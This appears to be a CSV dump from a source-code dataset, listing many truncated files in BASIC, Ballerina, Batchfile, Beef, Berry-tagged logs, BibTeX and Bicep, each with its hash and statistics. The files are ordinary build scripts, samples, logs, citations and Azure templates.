WUMPUS LOVERS!!!"" -0058 PRINT "" THERE ARE NOW TWO ADDITIONS TO THE WUMPUS FAMILY""; -0060 PRINT "" OF PROGRAMS."" -0062 PRINT -0064 PRINT "" WUMP2: SOME DIFFERENT CAVE ARRANGEMENTS"" -0066 PRINT "" WUMP3: DIFFERENT HAZARDS"" -0067 PRINT -0068 REM- SET UP CAVE (DODECAHEDRAL NODE LIST) -0070 DIM S(20,3) -0080 FOR J=1 TO 20 -0090 FOR K=1 TO 3 -0100 READ S(J,K) -0110 NEXT K -0120 NEXT J -0130 DATA 2,5,8,1,3,10,2,4,12,3,5,14,1,4,6 -0140 DATA 5,7,15,6,8,17,1,7,9,8,10,18,2,9,11 -0150 DATA 10,12,19,3,11,13,12,14,20,4,13,15,6,14,16 -0160 DATA 15,17,20,7,16,18,9,17,19,11,18,20,13,16,19 -0170 DEF FNA(X)=INT(20*RND(0))+1 -0180 DEF FNB(X)=INT(3*RND(0))+1 -0190 DEF FNC(X)=INT(4*RND(0))+1 -0","169","0.9135135135135135","0.0","0.0" -"017a277c86a9cc04a26736dc5bba3284d613e323","http_simple_client.bal",".bal","Ballerina","// Copyright (c) 2018 WSO2 Inc. (http://www.wso2.org) All Rights Reserved. -// -// WSO2 Inc. licenses this file to you under the Apache License, -// Version 2.0 (the ""License""); you may not use this file except -// in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// ""AS IS"" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -# Provides the HTTP remote functions for interacting with an HTTP server. Apart from the standard HTTP methods, `forward()` -# and `execute()` functions are provided. More complex and specific endpoint types can be created by wrapping this -# generic HTTP remote functions implementation. -# -# + url - The URL of the remote HTTP endpoint -#","189","0.9043062200956937","0.0","0.0" -"01afe8e805420c7caff9f1c38c8bad9d2240255b","eq2.bal",".bal","Ballerina"," -public type userPFoo object { - public int age; - public string name; - public string address; - public string zipcode = ""23468""; - - public new (age, name, address) {} - - public function getName () returns (string); - - public function getAge () returns (int); -}; - -function userPFoo::getName () returns (string) { - return self.name + "":userPFoo""; -} - -function userPFoo::getAge () returns (int) { - return self.age; -} -","189","0.9043062200956937","0.0","0.0" -"018fcaece5ed878eed2beb82a74adcea4576811d","crypto-test.bal",".bal","Ballerina","import ballerina.security.crypto; - -function testHmacWithMD5 (string base, string key) returns (string) { - return crypto:getHmac(base, key, crypto:Algorithm.MD5); -} - -function testHmacWithSHA1 (string base, string key) returns (string) { - return crypto:getHmac(base, key, crypto:Algorithm.SHA1); -} - -function testHmacWithSHA256 (string base, string key) returns (string) { - return crypto:getHmac(base, key, crypto:Algorithm.SHA256); -} - -function testHashWithMD5 (string base) returns (string) { - return crypto:getHash(base, crypto:Algorithm.MD5); -} - -function testHashWithSHA1 (string base) returns (string) { - return crypto:getHash(base, crypto:Algorithm.SHA1); -} - -function testHashWithSHA256 (string base) returns (string) { - return crypto:getHash(base, crypto:Algorithm.SHA256); -} -","189","0.9043062200956937","0.0","0.0" -"067885cdb38ac378495fe77f05b9c1d6d2cbe217","createVariableInServiceMethod.bal",".bal","Ballerina","import ballerina/module1; - -function createIntWithError() returns int|error { - return 10; -} - -public listener module1:Listener lst = new module1:Listener(23); - -service / on lst { - resource function get getResource() { - createIntWithError() - } - - remote function onCreate(TestClass cc) { - createIntWithError() - } -} -","189","0.9043062200956937","0.0","0.0" -"0f8f83fee433ddfa062c29ab33b6810c94a0c322","helloWorld.bal",".bal","Ballerina"," -import ballerina/io; - -function main (string... args) returns (int) { - io:println(""Hello, World! "" + args[0]); - - return 0; -} -","189","0.9043062200956937","0.0","0.0" -"095249119291990d1f92e1c56f12e128f9fc83f9","deploy.bat",".bat","Batchfile","cd %CATALINA_HOME%\webapps -DEL %CATALINA_HOME%\webapps\testtask-restservice-1.0-SNAPSHOT.war -rd %CATALINA_HOME%\webapps\testtask-restservice-1.0-SNAPSHOT /s /q -DEL %CATALINA_HOME%\webapps\testtask-webapplication-1.0-SNAPSHOT.war -rd %CATALINA_HOME%\webapps\testtask-webapplication-1.0-SNAPSHOT /s /q -move %CD%\\testtask-restservice\target\testtask-restservice-1.0-SNAPSHOT.war %CATALINA_HOME%\webapps -move %CD%\\testtask-webapplication\target\testtask-webapplication-1.0-SNAPSHOT.war %CATALINA_HOME%\webapps -cd %CATALINA_HOME%\bin -%CATALINA_HOME%\bin\startup.bat -","5406","0.5263362866322656","0.0","0.00388457269700333" -"06c56740399724b9d70662c1406b1fb64eb4f7b4","astviewer.bat",".bat","Batchfile","java -cp ../build;../lib/pmd-1.8.jar;../lib/xercesImpl-2.0.2.jar;../lib/xmlParserAPIs-2.0.2.jar;../lib/jaxen-core-1.0-fcs.jar;../lib/saxpath-1.0-fcs.jar net.sourceforge.pmd.util.ASTViewer -","5406","0.5263362866322656","0.0","0.00388457269700333" -"0fd9d2d2d7748f156a2836a4d279e1aa8d246192","ajbrowser.bat",".bat","Batchfile","@echo off -if exist ""%JAVA_HOME%\bin\java.exe"" goto haveJava -if exist ""%JAVA_HOME%\bin\java.bat"" goto haveJava -if exist ""%JAVA_HOME%\bin\java"" goto haveJava -echo java does not exist as %JAVA_HOME%\bin\java -echo please fix the JAVA_HOME environment variable - -:haveJava -""%JAVA_HOME%\bin\java"" -classpath ""%ASPECTJ_HOME%\lib\aspectjtools.jar;%JAVA_HOME%\lib\tools.jar;%CLASSPATH%"" -Xmx64M org.aspectj.tools.ajbrowser.Main %1 %2 %3 %4 %5 %6 %7 %8 %9 -","5406","0.5263362866322656","0.0","0.00388457269700333" -"03d28a9e143eabd9eba6eb1eb315b33e5214fa20","svc.bat",".bat","Batchfile","@echo off - -:setvars -:: need user input -:: must -set dllfullpath="""" -:: not must -set proxyfilefullpath="""" - -set in= -set dllpath= -set svcutilpath=""%C:\Program Files (x86)\Microsoft SDKs\Windows\v7.0A\Bin\NETFX 4.0 Tools%"" -set defaultproxyfilename=WebServiceProxy.cs - -:parseargs -if ""%1""==""/?"" ( - goto :usage -) - -if ""%1""=="""" ( - goto :checkargs -) else if /I ""%1""==""-dll"" ( - set dllfullpath=""%2"" - shift -) else if /I ""%1""==""-cs"" ( - set proxyfilefullpath=""%2"" - shift -) else goto :checkargs -shift -goto :parseargs - -:checkargs: -if %dllfullpath%=="""" goto :input -if %proxyfilefullpath%=="""" goto :input - -:begin -c: -cd %svcutilpath% -set generatefilepath=%dllpath%GFile -if %proxyfilefullpath%=="""" set proxyfilefullpath=""%generatefilepath%\%defaultproxyfilename%"" -SvcUtil.exe %dllfullpath% /directory:""%generatefilepath%"" - -if %errorlevel% NEQ 0 ( - pause -) else ( - svcutil.exe /t:code ""%generatefilepath%\*.wsdl"" ""%generatefilepath%\*.xsd"" /o:%proxyfilefullpath% -) -goto :end - -:input -:inputDllFullPath -set in= -set /p in=plea","5406","0.5263362866322656","0.0","0.00388457269700333" -"0872cb52c6da151adc6a03545b34aa8d144a158e","COMPLIB.BAT",".bat","Batchfile","g:\local\tc\bin\tcc -c -DTURBOC -Iv: -Ig:\local\tc\include v:*.c -g:\local\tc\tasm /Mx v:*.asm -copy v:proto.lib xinu.lib -for %%j in (*.obj) do g:\local\tc\bin\tlib /C xinu.lib+%%j -","5406","0.5263362866322656","0.0","0.00388457269700333" -"0dfeb16bfd98c1b2f9e49f90a89ff7d1ac2ca0cb","initScript.cmd",".cmd","Batchfile","npm i --save uuid -npm i --save mongoose-auto-increment -","4856","0.4727874598383799","0.0","0.0016474464579901153" -"14477fcb36a6c98caf90337df47773f3a79dfe63","boilerplate.cmd",".cmd","Batchfile",":: Created by npm, please don't edit manually. -@IF EXIST ""%~dp0\node.exe"" ( - ""%~dp0\node.exe"" ""%~dp0\..\boilerplate\bin\boilerplate"" %* -) ELSE ( - node ""%~dp0\..\boilerplate\bin\boilerplate"" %* -)","4856","0.4727874598383799","0.0","0.0016474464579901153" -"010c7c2d9581c1f8061e2fa8b2c55b681e0968ca","build-sln.cmd",".cmd","Batchfile","@ECHO OFF -SETLOCAL ENABLEDELAYEDEXPANSION -PUSHD %~dp0.. -SET ROOT=%CD%\ - -SET BRANCH= -FOR /F USEBACKQ %%G IN (`git branch ^| grep \* ^| cut -d ' ' -f2`) DO ( SET BRANCH=%%G ) - - -SET CONFIGURATION= -IF ""!BRANCH:~0,7!"" EQU ""release"" ( - SET CONFIGURATION=Release -) ELSE IF ""!BRANCH:~0,6!"" EQU ""master"" ( - SET CONFIGURATION=Release -) ELSE ( - SET CONFIGURATION=Debug -) - -SET PLATFORM=x86 -SET ROOT -IF ""%~dp1"" EQU ""!ROOT!"" ( - SET MSBUILD_PROPS=Configuration=%CONFIGURATION%;Platform=!PLATFORM! -) ELSE ( - SET MSBUILD_PROPS=Configuration=%CONFIGURATION%;Platform=!PLATFORM!;SolutionDir=!ROOT! -) - -CALL scripts\now BUILD_START -ECHO [ BUILD START ] %BUILD_START% ^> msbuild-%~nx1.%BUILD_START%.log -CALL scripts\msbuild ""%~nx1"" /p:!MSBUILD_PROPS! > msbuild-%~nx1.%BUILD_START%.log -CALL scripts\now BUILD_FINISH -ECHO [ BUILD FINISH ] %BUILD_FINISH% -POPD -ENDLOCAL","4856","0.4727874598383799","0.0","0.0016474464579901153" -"01165d64eb005e7ba3d86c1e8dbc5781a7ab71e4",".scsi_proc.o.cmd",".cmd","Batchfile","cmd_drivers/scsi/scsi_proc.o := arm-brcm-linux-uclibcgnueabi-gcc -Wp,-MD,drivers/scsi/.scsi_proc.o.d -nostdinc -isystem /home/mango/develop/am-toolchains/brcm-arm-sdk/hndtools-arm-linux-2.6.36-uclibc-4.5.3/bin/../lib/gcc/arm-brcm-linux-uclibcgnueabi/4.5.3/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/linux/linux-2.6.36/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-brcm-hnd/include -Iarch/arm/plat-brcm/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -fno-delete-null-pointer-checks -I/home/mango/data/awrt-mango/src-rt-9.x/src/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/common/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/shared/bcmwifi/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/common/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/co","4856","0.4727874598383799","0.0","0.0016474464579901153" -"00b224d24fc8f99d04c42c6a2a0298c4bbb5cff5",".built-in.o.cmd",".cmd","Batchfile","cmd_drivers/tty/ipwireless/built-in.o := rm -f drivers/tty/ipwireless/built-in.o; /home/rk3288-sdk/prebuilts/gcc/linux-x86/arm/arm-eabi-4.6/bin/arm-eabi-ar rcsD drivers/tty/ipwireless/built-in.o -","4856","0.4727874598383799","0.0","0.0016474464579901153" -"01a6b71d144e5f82b313cb83d1e0c79ffeea2a26","Matrix4x3.bf",".bf","Beef","/* -Copyright (c) 2006 - 2008 The Open Toolkit library. - -Permission is hereby granted, free of charge, to any person obtaining a copy of -this software and associated documentation files (the ""Software""), to deal in -the Software without restriction, including without limitation the rights to -use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies -of the Software, and to permit persons to whom the Software is furnished to do -so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISIN","17","1.0","0.0","0.0" -"11aa49276b2679a65ba2bc6bfbdceab9ab30a81a","Sprite.bf",".bf","Beef","using System; -using SDL2; -using System.IO; -using System.Text; -using System.Collections; -using MiniZ; - -namespace Strawberry -{ - public class Sprite - { - private enum Modes - { - Indexed = 1, - Grayscale = 2, - RGBA = 4, - } - - private enum Chunks - { - OldPaletteA = 0x0004, - OldPaletteB = 0x0011, - Layer = 0x2004, - Cel = 0x2005, - CelExtra = 0x2006, - Mask = 0x2016, - Path = 0x2017, - FrameTags = 0x2018, - Palette = 0x2019, - UserData = 0x2020, - Slice = 0x2022 - } - - public readonly String Path; - - public int Width { get; private set; } - public int Height { get; private set; } - - private Frame[] frames; - private List layers; - private List tags; - private List slices; - private Modes mode; - - private this(String path) - { - Path = new String(path); - Load(); - } - - public ~this() - { - delete Path; - Unload(); - } - - public Frame this[int index] - { - get => frames[index]; - } - - private void Unload() - ","17","1.0","0.0","0.0" -"04aa30897532ecb9c3e0ad6097f7a55fb48d6b25","all.bf",".bf","Beef","SNHOME=/usr/local/snavigator -export SNHOME -suffix_path_with_dirlist PATH $SNHOME/bin -","17","1.0","0.0","0.0" -"124142eeee402db808a58f3b119699d0d18fc63b","snapshot.mag.no.sphere.Npol.6.Plen.100.Nlinks.20.D.15.la.6.phi_mag.0.05.999.bf",".bf","Beef","{particles {id pos type dip} - {0 -0.6346651285298357 -12.000977948299429 32.7489210979842 1 0.0 0.0 0.0} - {1 -1.2899497889443943 -12.128689317605463 33.542753080829364 1 0.0 0.0 -0.0} - {2 -0.49741279454160114 -11.62326327543871 34.086484700297774 1 0.0 -0.0 -0.0} - {3 0.3445324359274872 -11.183539777445738 33.81835220675781 1 0.0 0.0 0.0} - {4 0.9741145334591921 -10.537994172289334 33.416987355416815 1 0.0 -0.0 -0.0} - {5 0.41324370291246854 -10.845143899470312 32.50084917806978 1 -0.0 0.0 0.0} - {6 0.2993768245629416 -11.851366354172352 32.186013740267356 1 -0.0 -0.0 -0.0} - {7 1.0913566246811053 -12.185568434282825 31.695646909852442 1 -0.0 0.0 -0.0} - {8 1.2955836553379763 -11.197843665810087 31.630665756805215 1 -0.34749394047039717 2.2906204980637037 0.7951765182566368} - {9 1.2021634880933123 -11.03225013961686 30.614338452247086 1 -0.0 -0.0 0.0} - {10 1.4411533051317917 -10.782937374623316 29.655188621577835 1 0.0 0.0 0.0} - {11 1.6910051121833847 -10.099293068562591 30.28484828048429 1","17","1.0","0.0","0.0" -"00c7a099feba0ac4e242217fef88d033a132e627","snapshot.mag.no.sphere.Npol.6.Plen.100.Nlinks.20.D.15.la.5.phi_mag.0.05.999.bf",".bf","Beef","{particles {id pos type dip} - {0 13.744257679597414 -3.7814179290707486 22.871937932174152 1 0.0 0.0 -0.0} - {1 14.58759632771874 -3.7089329139054747 22.417023969212774 1 0.0 0.0 -0.0} - {2 14.266952527384724 -2.796620785053694 22.36209083082123 1 -0.0 -0.0 -0.0} - {3 15.293420846647008 -2.651122314389502 22.391755501458935 1 -0.0 0.0 -0.0} - {4 16.056666636760315 -3.221960783603288 21.95968502389473 1 -0.0 -0.0 0.0} - {5 16.695376145298784 -3.535989585855571 22.61346295751222 1 0.0 -0.0 0.0} - {6 17.134606104412534 -2.6019971899449494 22.73575039394287 1 0.0 -0.0 -0.0} - {7 18.01432007661625 -3.056318945012613 22.64114944624209 1 -0.0 0.0 -0.0} - {8 18.845329151921938 -3.6679627711014398 22.503373653431105 1 -0.0 0.0 -0.0} - {9 19.337999731279293 -3.390298803672003 23.350989356914972 1 -0.0 -0.0 -0.0} - {10 19.56691067004665 -3.0685663794770974 22.362624634823412 1 0.0 -0.0 0.0} - {11 20.278527389886467 -3.741011362000201 22.540455326013387 1 0.0 0.0 -0.0} - {12 20.713725719541838 -3.33535149310","17","1.0","0.0","0.0" -"048483c965a38facdcba73d2e08ba57e7ba0957a","log_nuc11-35.wilab1.ilabt.iminds.be",".be","Berry","perl: warning: Setting locale failed. -perl: warning: Please check that your locale settings: - LANGUAGE = (unset), - LC_ALL = (unset), - LC_PAPER = ""it_IT.UTF-8"", - LC_ADDRESS = ""it_IT.UTF-8"", - LC_MONETARY = ""it_IT.UTF-8"", - LC_NUMERIC = ""it_IT.UTF-8"", - LC_TELEPHONE = ""it_IT.UTF-8"", - LC_IDENTIFICATION = ""it_IT.UTF-8"", - LC_MEASUREMENT = ""it_IT.UTF-8"", - LC_TIME = ""it_IT.UTF-8"", - LC_NAME = ""it_IT.UTF-8"", - LANG = ""en_US.UTF-8"" - are supported and installed on your system. -perl: warning: Falling back to a fallback locale (""en_US.UTF-8""). -2018-03-20 20:21:46,813 - SensorNodeFactory.create_nodes_auto() - INFO - cc2538-bsl.py -p /dev/ttyUSB0 -a 0x00202000 -Opening port /dev/ttyUSB0, baud 500000 address 0x202000 -Connecting to target... -CC2538 PG2.0: 512KB Flash, 32KB SRAM, CCFG at 0x0027FFD4 -Primary IEEE Address: 00:12:4B:00:10:03:56:64 -2018-03-20 20:21:46,975 - SensorNodeFactory.create_nodes_auto() - INFO - b'' -2018-03-20 20:21:46,976 - SensorNodeFactory.create_nodes_auto() - INFO - Found Zoul on","27","0.9","0.0","0.0" -"05183a0181151c335fe9253e54f91577becbf5d7","target0.be",".be","Berry","% .be Whois Server 4.0 -% -% (c) dns.be 2001-2004 (http://www.dns.be) -% -%- The WHOIS service offered by DNS and the access to the records in the DNS -%- WHOIS database are provided for information purposes only. It allows -%- persons to check whether a specific domain name is still available or not -%- and to obtain information related to the registration records of -%- existing domain names. -%- -%- DNS cannot, under any circumstances, be held liable where the stored -%- information would prove to be incomplete or inaccurate in any sense. -%- -%- By submitting a query you agree not to use the information made available -%- to: -%- - allow, enable or otherwise support the transmission of unsolicited, -%- commercial advertising or other solicitations whether via email or otherwise; -%- - target advertising in any possible way; -%- - to cause nuisance in any possible way to the domain name holders by sending -%- messages to them (whether by automated, electronic processes capable of -%- ","27","0.9","0.0","0.0" -"0c332f80cf239d5936800dabe923bde19e092e36","socialvi.be",".be","Berry","% .be Whois Server 4.0 -% -% (c) dns.be 2001-2004 (http://www.dns.be) -% -%- The WHOIS service offered by DNS and the access to the records in the DNS -%- WHOIS database are provided for information purposes only. It allows -%- persons to check whether a specific domain name is still available or not -%- and to obtain information related to the registration records of -%- existing domain names. -%- -%- DNS cannot, under any circumstances, be held liable where the stored -%- information would prove to be incomplete or inaccurate in any sense. -%- -%- By submitting a query you agree not to use the information made available -%- to: -%- - allow, enable or otherwise support the transmission of unsolicited, -%- commercial advertising or other solicitations whether via email or otherwise; -%- - target advertising in any possible way; -%- - to cause nuisance in any possible way to the domain name holders by sending -%- messages to them (whether by automated, electronic processes capable of -%- ","27","0.9","0.0","0.0" -"083bf72a5313d9bea3e60615f5b9b222926071c4","log_nuc11-12.wilab1.ilabt.iminds.be",".be","Berry","perl: warning: Setting locale failed. -perl: warning: Please check that your locale settings: - LANGUAGE = (unset), - LC_ALL = (unset), - LC_PAPER = ""it_IT.UTF-8"", - LC_ADDRESS = ""it_IT.UTF-8"", - LC_MONETARY = ""it_IT.UTF-8"", - LC_NUMERIC = ""it_IT.UTF-8"", - LC_TELEPHONE = ""it_IT.UTF-8"", - LC_IDENTIFICATION = ""it_IT.UTF-8"", - LC_MEASUREMENT = ""it_IT.UTF-8"", - LC_TIME = ""it_IT.UTF-8"", - LC_NAME = ""it_IT.UTF-8"", - LANG = ""en_US.UTF-8"" - are supported and installed on your system. -perl: warning: Falling back to a fallback locale (""en_US.UTF-8""). -2018-04-18 00:01:46,031 - SensorNodeFactory.create_nodes_auto() - INFO - cc2538-bsl.py -p /dev/ttyUSB0 -a 0x00202000 -Opening port /dev/ttyUSB0, baud 500000 address 0x202000 -Connecting to target... -CC2538 PG2.0: 512KB Flash, 32KB SRAM, CCFG at 0x0027FFD4 -Primary IEEE Address: 00:12:4B:00:10:03:54:20 -2018-04-18 00:01:46,195 - SensorNodeFactory.create_nodes_auto() - INFO - b'' -2018-04-18 00:01:46,195 - SensorNodeFactory.create_nodes_auto() - INFO - Found Zoul on","27","0.9","0.0","0.0" -"0f638e0be90606d4aa902192ed2bc36be1585952","logfile_www.bozar.be",".be","Berry","--2020-03-02 00:19:31-- http://www.bozar.be/file/2706/download -Resolving www.bozar.be (www.bozar.be)... 5.135.115.84 -Connecting to www.bozar.be (www.bozar.be)|5.135.115.84|:80... connected. -HTTP request sent, awaiting response... 301 Moved Permanently -Location: https://www.bozar.be/file/2706/download [following] ---2020-03-02 00:19:31-- https://www.bozar.be/file/2706/download -Connecting to www.bozar.be (www.bozar.be)|5.135.115.84|:443... connected. -HTTP request sent, awaiting response... 200 OK -Length: 7532575 (7.2M) [application/pdf] -Saving to: ‘/dev/null’ - - 0K .......... .......... .......... .......... .......... 0% 13.0M 5s - 50K .......... .......... .......... .......... .......... 1% 25.3M 3s - 100K .......... .......... .......... .......... .......... 2% 31.5M 3s - 150K .......... .......... .......... .......... .......... 2% 29.5M 3s - 200K .......... .......... .......... .......... .......... 3% 110M 2s - 250K .......... .......... .......... .......... ..","27","0.9","0.0","0.0" -"0a01d4dba420805efcf00807eafc7b6da0fb4983","cite.bib",".bib","BibTeX","@article{MELE2020102193, - author = {Ida Mele and Nicola Tonellotto and Ophir Frieder and Raffaele Perego}, - doi = {https://doi.org/10.1016/j.ipm.2019.102193}, - issn = {0306-4573}, - journal = {Information Processing & Management}, - number = {3}, - pages = {102193}, - title = {Topical result caching in web search engines}, - volume = {57}, - year = {2020} -} - -","1405","1.0007122507122508","0.0","0.0" -"132221854392e72c9af050a4753a1216730d329c","10.10022Fima.10007.bib",".bib","BibTeX","@article {IMA:IMA10007, -author = {Gregor, Jens and Rannou, Fernando R.}, -title = {Three-dimensional support function estimation and application for projection magnetic resonance imaging}, -journal = {International Journal of Imaging Systems and Technology}, -volume = {12}, -number = {1}, -publisher = {John Wiley & Sons, Inc.}, -issn = {1098-1098}, -url = {http://dx.doi.org/10.1002/ima.10007}, -doi = {10.1002/ima.10007}, -pages = {43--50}, -keywords = {support function, projection imaging, magnetic resonance imaging}, -year = {2002}, -} -","1405","1.0007122507122508","0.0","0.0" -"00e57feb494acab731754e1c0ff67ebf83640204","paperBib.bib",".bib","BibTeX","@article{Shannon, - title=""A mathematical theory of communication"", - author=""Shannon, Claude Elwood"", - journal=""ACM SIGMOBILE Mobile Computing and Communications Review"", - volume=""5"", - number=""1"", - pages=""3--55"", - year=""1948"", - publisher=""ACM"" -} - -@book{Jaynesfull, - title=""ET Jaynes: Papers on probability, statistics, and statistical physics"", - author=""Jaynes, Edwin Thompson"", - volume=""50"", - year=""1989"", - publisher=""Springer"" -} - -@article{Jaynes3, - title=""Information theory and statistical mechanics"", - author=""Jaynes, Edwin T"", - journal=""Physical review"", - volume=""106"", - number=""4"", - pages=""620"", - year=""1957"", - publisher=""APS"" -} - -@article{Inadequacy, - title=""Conceptual inadequacy of the Shannon information in quantum measurements"", - author=""Brukner, vaslav and Zeilinger, Anton"", - journal=""Physical Review A"", - volume=""63"", - number=""2"", - pages=""022113"", - year=""2001"", - publisher=""APS"" -} - -@article{Tsallis2, - title=""Possib","1405","1.0007122507122508","0.0","0.0" -"0fa29c6a16879a3afbf317adc3c85f656f039ea6","BEP-Comparison.bib",".bib","BibTeX","Automatically generated by Mendeley Desktop 1.17.13 -Any changes to this file will be lost if it is regenerated by Mendeley. - -BibTeX export options can be customized via Options -> BibTeX in Mendeley Desktop - -@article{Colless1999, -author = {Colless, M and {The 2DF Galaxy Redshift Survey Team} and Ellis, R and Bland-Hawthorn, J and Cannon, R and Cole, S and Collins, C and Couch, W and Dalton, G and Driver, S and Efstathiou, G and Folkes, S and Frenk, C and Glazebrook, K and Kaiser, N and Lahav, O and Lewis, I and Lumsden, S and Maddox, S and Peacock, J and Peterson, B and Price, I and Sutherland, W and Taylor, K}, -file = {:C$\backslash$:/Users/Jaap/AppData/Local/Mendeley Ltd./Mendeley Desktop/Downloaded/Colless et al. - 1999 - The 2dF Galaxy Redshift Survey.pdf:pdf}, -journal = {Looking Deep in the Southern Sky}, -keywords = {clusters,cosmology,distances and redshifts,galaxies,general,large-scale structure of universe,observations,surveys}, -pages = {9}, -title = {{The 2dF Galaxy Redshift Su","1405","1.0007122507122508","0.0","0.0" -"0a1c889cbf643e40f8654717b36d5bb580dfa125","katselis-12-c.bib",".bib","BibTeX","@inproceedings{Katselis:12c, - address = {Maui, Hw, USA}, - author = {D. Katselis and C.R. Rojas and H. Hjalmarsson and M. Bengtsson}, - booktitle = {Proceedings 51th IEEE Conference on Decision and Control}, - pages = {}, - title = {A Chernoff Relaxation on the Problem of Application-Oriented Finite Sample Experiment Design}, - year = {2012} -} - -","1405","1.0007122507122508","0.0","0.0" -"1893c8bda01b999f2a00e5726ca0c2ce316b3e6a","role-discovery.bicep",".bicep","Bicep","param location string -param utcValue string = utcNow() -param roleName string -param uamiId string -param storageAccountName string -param storageAccountId string -param storageAccountApiVersion string -resource role_def_discovery_script 'Microsoft.Resources/deploymentScripts@2020-10-01' = { - name: 'roleDefinitionDiscovery' - location: location - identity: { - type: 'UserAssigned' - userAssignedIdentities: { - '${uamiId}': {} - } - } - kind: 'AzurePowerShell' - properties: { - forceUpdateTag: utcValue - azPowerShellVersion: '3.0' - timeout: 'PT10M' - storageAccountSettings: { - storageAccountName: storageAccountName - storageAccountKey: listKeys(storageAccountId, storageAccountApiVersion).keys[0].value - } - arguments: '-roleName \'${roleName}\'' - scriptContent: ''' - param($roleName) - $role = Get-AzRoleDefinition -Name $roleName - if ($role) { - $roleExists = $true - $existingRoleId = $role.id - $existingScopes = $role.AssignableScopes -j","15","0.8333333333333334","0.0","0.0" -"0178a2e9a977c2bb2d7d58f3bffd3288fa9693f3","CreateSqlVirtualMachineTemplate.bicep",".bicep","Bicep","param sqlConnectivityType string = 'Public' -param sqlPortNumber int = 41433 -param sqlStorageWorkloadType string = 'DW' -param sqlStorageDisksConfigurationType string = 'NEW' -param sqlAutopatchingDayOfWeek string = 'Sunday' -param sqlAutopatchingStartHour int = 2 -param sqlAutopatchingWindowDuration int = 60 -param sqlAuthenticationLogin string = 'tSQLt' -param sqlAuthenticationPassword string = 'sdlfksdlkfjlsdkjf39939^' -param newVMName string = 'V1052sql2014sp3' -param newVMRID string = '/subscriptions/58c04a99-5b92-410c-9e41-10262f68ca80/resourceGroups/tSQLtCI_DevTestLab_20200318_1052-V1052sql2014sp3-155797/providers/Microsoft.Compute/virtualMachines/V1052sql2014sp3' - -resource newVMName_resource 'Microsoft.SqlVirtualMachine/SqlVirtualMachines@2017-03-01-preview' = { - name: newVMName - location: resourceGroup().location - properties: { - virtualMachineResourceId: newVMRID - sqlManagement: 'Full' - sqlServerLicenseType: 'PAYG' - autoPatchingSettings: { - enable: true - dayOfW","15","0.8333333333333334","0.0","0.0" -"0302c9ce28179816d3987a1c40eab93ba586da64","main.syntax.bicep",".bicep","Bicep","/* - This is a block comment. -*/ -//@[2:6) NoOpDeclarationSyntax -//@[2:6) NewLine |\r\n\r\n| - -// parameters without default value -//@[35:37) NoOpDeclarationSyntax -//@[35:37) NewLine |\r\n| -param myString string -//@[0:23) ParameterDeclarationSyntax -//@[0:5) Identifier |param| -//@[6:14) IdentifierSyntax -//@[6:14) Identifier |myString| -//@[15:21) TypeSyntax -//@[15:21) Identifier |string| -//@[21:23) NewLine |\r\n| -param myInt int -//@[0:17) ParameterDeclarationSyntax -//@[0:5) Identifier |param| -//@[6:11) IdentifierSyntax -//@[6:11) Identifier |myInt| -//@[12:15) TypeSyntax -//@[12:15) Identifier |int| -//@[15:17) NewLine |\r\n| -param myBool bool -//@[0:21) ParameterDeclarationSyntax -//@[0:5) Identifier |param| -//@[6:12) IdentifierSyntax -//@[6:12) Identifier |myBool| -//@[13:17) TypeSyntax -//@[13:17) Identifier |bool| -//@[17:21) NewLine |\r\n\r\n| - -// parameters with default value -//@[32:34) NoOpDeclarationSyntax -//@[32:34) NewLine |\r","15","0.8333333333333334","0.0","0.0" -"0626b1c98f71ff55a11319af9b963be65e908326","comments.bicep",".bicep","Bicep","resource test 'Microsoft.AAD/domainServices@2021-03-01' = { - name: 'asdfsdf' - // this is a comment - properties: {/*comment*/ - domainConfigurationType/*comment*/:/*comment*/'as//notacomment!d/* also not a comment */fsdf'// test!/* - /* multi - line - comment */ domainName: /* - asdf*/'test' - // comment - } -} -","15","0.8333333333333334","0.0","0.0" -"0122c35d7153e2bcdc8d0363df15ecc1abe50ecc","main.syntax.bicep",".bicep","Bicep","targetScope='tenant' -//@[00:127) ProgramSyntax -//@[00:020) ├─TargetScopeSyntax -//@[00:011) | ├─Token(Identifier) |targetScope| -//@[11:012) | ├─Token(Assignment) |=| -//@[12:020) | └─StringSyntax -//@[12:020) | └─Token(StringComplete) |'tenant'| -//@[20:022) ├─Token(NewLine) |\n\n| - -var deploymentLocation = deployment().location -//@[00:046) ├─VariableDeclarationSyntax -//@[00:003) | ├─Token(Identifier) |var| -//@[04:022) | ├─IdentifierSyntax -//@[04:022) | | └─Token(Identifier) |deploymentLocation| -//@[23:024) | ├─Token(Assignment) |=| -//@[25:046) | └─PropertyAccessSyntax -//@[25:037) | ├─FunctionCallSyntax -//@[25:035) | | ├─IdentifierSyntax -//@[25:035) | | | └─Token(Identifier) |deployment| -//@[35:036) | | ├─Token(LeftParen) |(| -//@[36:037) | | └─Token(RightParen) |)| -//@[37:038) | ├─Token(Dot) |.| -//@[38:046) | └─IdentifierSyntax -//@[38:046) | └─Token(Identifier) |location| -//@[46:048) ├─Token(NewLine) |\n\n| - -var scopesWithArmRepresentation = { -//@[00:056) 